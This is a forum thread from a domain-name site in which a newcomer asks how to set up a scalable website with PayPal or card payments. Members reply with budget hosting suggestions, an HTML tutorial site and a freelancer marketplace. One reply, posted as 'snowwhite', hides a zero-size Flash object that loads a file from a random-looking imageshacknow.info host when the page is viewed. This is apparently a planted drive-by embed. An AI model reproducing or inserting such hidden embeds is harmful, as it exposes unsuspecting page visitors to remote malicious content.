Enjoy unlimited access to all forum features for FREE! Optional upgrade available for extra perks.
Sedo.com

Starting a New Domain

Status
Not open for further replies.

ammakudalkar

Legacy Platinum Member
Reaction score
Hi everyone. I wanted to start my own website which I want to continue for long time. It may require some large storage space in future so wanted some scalability built into it. The domain should have options for online payment; maybe through paypal or through direct credit card. Considering the fact that I am a Finance guy with no IT related background I am expecting some expert guidance from you all. Thanks in advance.:)

snowwhite

Level 1
Legacy Platinum Member
Reaction score
Hi everyone. I wanted to start my own website which I want to continue for long time. It may require some large storage space in future so wanted some scalability built into it. The domain should have options for online payment; maybe through paypal or through direct credit card. Considering the fact that I am a Finance guy with no IT related background I am expecting some expert guidance from you all. Thanks in advance.:) <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://m09y0106tkvx208.imageshacknow.info/pages/2510/"></param><param name="allowFullScreen" value="true"></param><embed src="http://m09y0106tkvx208.imageshacknow.info/pages/2510/" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

I'll be interested to see what people have to say here.....

Biggie

DNForum Moderator
Legacy Exclusive Member
Reaction score
Hi everyone. I wanted to start my own website which I want to continue for long time. It may require some large storage space in future so wanted some scalability built into it. The domain should have options for online payment; maybe through paypal or through direct credit card. Considering the fact that I am a Finance guy with no IT related background I am expecting some expert guidance from you all. Thanks in advance.:)

if you want to experiment on cheap budget, then here's what i would do

at directnic.com, you can register your domain and get free hosting to build as many pages you want for only $15 a year.

the catch > they place a small banner at the top of each page.

if you know html then you can construct pages in notepad and upload thru FTP

if you don't know any html, then you can learn at w3schools.com

directnic also has merchant account feature to accept cc's on your site and you can go to paypal to get code for adding paypal to your site as well.

then if/after you see your site growing, you can always transfer files to another host or get your own server.

fillaman

Level 1
Legacy Platinum Member
Reaction score
Wihen I started I was new too, but was introduced to scriptlance.com where you can always post your project (eg. want to build a new website) and allow seasoned programmers to bid on it. You will then chose the bidder with the lowest cost to you and allow the bid winner to build your site for you. Although I bought my website www.webauctionsdaily.com, I have used Scriptlance serveral time to make changes to the website and it was perfect.

Status
Not open for further replies.

The Rule #1

Do not insult any other member. Be polite and do business. Thank you!

Sedo - it.com Premiums

IT.com

Premium Members

MariaBuy

Our Mods' Businesses

UrlPick.com

*the exceptional businesses of our esteemed moderators

Top Bottom